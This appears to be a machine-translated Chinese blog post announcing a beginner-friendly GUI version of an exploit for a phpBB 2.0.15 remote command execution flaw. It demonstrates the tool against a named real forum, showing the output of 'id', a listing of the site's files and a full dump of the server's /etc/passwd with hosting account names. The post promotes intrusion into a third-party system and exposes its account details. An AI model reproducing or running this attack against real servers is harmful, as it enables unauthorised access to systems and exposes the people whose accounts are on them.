The annoying little semester finally finished, see the Invincible brother's < Now, there is time, and I have also written a GUI version of this exploit program, suitable for beginners to use. The program basically implements the http://www.securiteam.com/exploits/ 5qp0x00g0c.html the functionality of this Python program. Note: When the volume of reading data is too large, the program will appear briefly suspended animation.
Test:
Forum url:http://www.tuoitho.net/diendan/
Topic id:15218 Command:id
Data received:uid=99 (nobody) gid=99 (nobody) groups=99 (nobody)
Of course we can switch to other commands such as input LS to return:
_makepagelink.php
_new_register.txt
_news.txt
Admin
bank_index.php
Cache
Chat_popup.js
common.php
config.php
Db
Ecards
Extension.inc
faq.php
FlashGame
forum.php
Gallery
groupcp.php
Images
Includes
index.php
Language
login.php
memberlist.php
modcp.php
Photo
posting.php
privmsg.php
profile.php
realmusic.php
search.php
streammedia.php
Templates
Tt_images
Tt_temp
ttd_news.php
Vietuni8.js
viewforum.php
viewonline.php
viewtopic.php
Ysi.htm
ysi.php
Enter CAT/ETC/PASSWD to return:
Root:x:0:0:root:/root:/bin/bash
Bin:x:1:1:bin:/bin:/sbin/nologin
Daemon:x:2:2:daemon:/sbin:/sbin/nologin
Adm:x:3:4:adm:/var/adm:/sbin/nologin
Lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
Sync:x:5:0:sync:/sbin:/bin/sync
Shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
Halt:x:7:0:halt:/sbin:/sbin/halt
Mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
News:x:9:13:news:/etc/news:
Uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
Operator:x:11:0:operator:/root:/sbin/nologin
Games:x:12:100:games:/usr/games:/sbin/nologin
Gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
Ftp:x:14:50:ftp User:/var/ftp:/sbin/nologin
Nobody:x:99:99:nobody:/:/sbin/nologin
Vcsa:x:69:69:virtual Console Memory Owner:/dev:/sbin/nologin
Rpm:x:37:37::/var/lib/rpm:/sbin/nologin
NSCD:X:28:28:NSCD Daemon:/:/sbin/nologin
Ident:x:100:101::/home/ident:/sbin/nologin
Netdump:x:34:34:network Crash Dump User:/var/crash:/bin/bash
Sshd:x:74:74:privilege-separated Ssh:/var/empty/sshd:/sbin/nologin
Rpc:x:32:32:portmapper RPC User:/:/sbin/nologin
Pcap:x:77:77::/var/arpwatch:/sbin/nologin
Xfs:x:43:43:x Font Server:/etc/x11/fs:/sbin/nologin
Wnn:x:49:49:wnn Input Server:/var/lib/wnn:/sbin/nologin
Named:x:25:25:named:/var/named:/sbin/nologin
Mysql:x:101:102:mysql Server:/var/lib/mysql:/bin/bash
Mailnull:x:47:47:exim:/var/spool/mqueue:/bin/false
Cpanel:x:32001:502::/usr/local/cpanel:/bin/bash
Mailman:x:32002:503::/usr/local/cpanel/3rdparty/mailman:/bin/bash
Ltsv-1990:x:32003:32003::/home/ltsv-1990:/bin/bash
Ttnet:x:32004:504::/home/ttnet:/bin/bash
Ttmail:x:32005:505::/home/ttmail:/usr/local/cpanel/bin/noshell
Doicongl:x:32006:506::/home/doicongl:/usr/local/cpanel/bin/noshell
Realmsof:x:32007:507::/home/realmsof:/usr/local/cpanel/bin/noshell
Trpanoco:x:32009:509::/home/trpanoco:/usr/local/cpanel/bin/noshell
Qua:x:32008:508::/home/qua:/usr/local/cpanel/bin/noshell
Key:x:32010:510::/home/key:/usr/local/cpanel/bin/noshell
Cuop:x:32011:511::/home/cuop:/usr/local/cpanel/bin/noshell
Bluewebp:x:32012:512::/home/bluewebp:/usr/local/cpanel/bin/noshell
Shugoten:x:32013:513::/home/shugoten:/usr/local/cpanel/bin/noshell
Afghansa:x:32014:514::/home/afghansa:/usr/local/cpanel/bin/noshell
Polishtr:x:32015:515::/home/polishtr:/usr/local/cpanel/bin/noshell
Gioitrec:x:32016:516::/home/gioitrec:/usr/local/cpanel/bin/noshell
Colorado:x:32017:517::/home/colorado:/usr/local/cpanel/bin/noshell
Wannabel:x:32018:518::/home/wannabel:/usr/local/cpanel/bin/noshell
Cactuslo:x:32019:519::/home/cactuslo:/usr/local/cpanel/bin/noshell
Aznphoto:x:32020:520::/home/aznphoto:/bin/bash
Journeyo:x:32021:521::/home/journeyo:/usr/local/cpanel/bin/noshell
Chiropra:x:32022:522::/home/chiropra:/usr/local/cpanel/bin/noshell
http://www.bkjia.com/PHPjc/532621.html www.bkjia.com true http://www.bkjia.com/PHPjc/532621.html techarticle the annoying little semester is finally over, see the invincible Brother's PHPbb2.0.15 remote Command execution Vulnerability test Rewrite, now available, oneself also wrote a GUI version of this exploit program, suitable ...
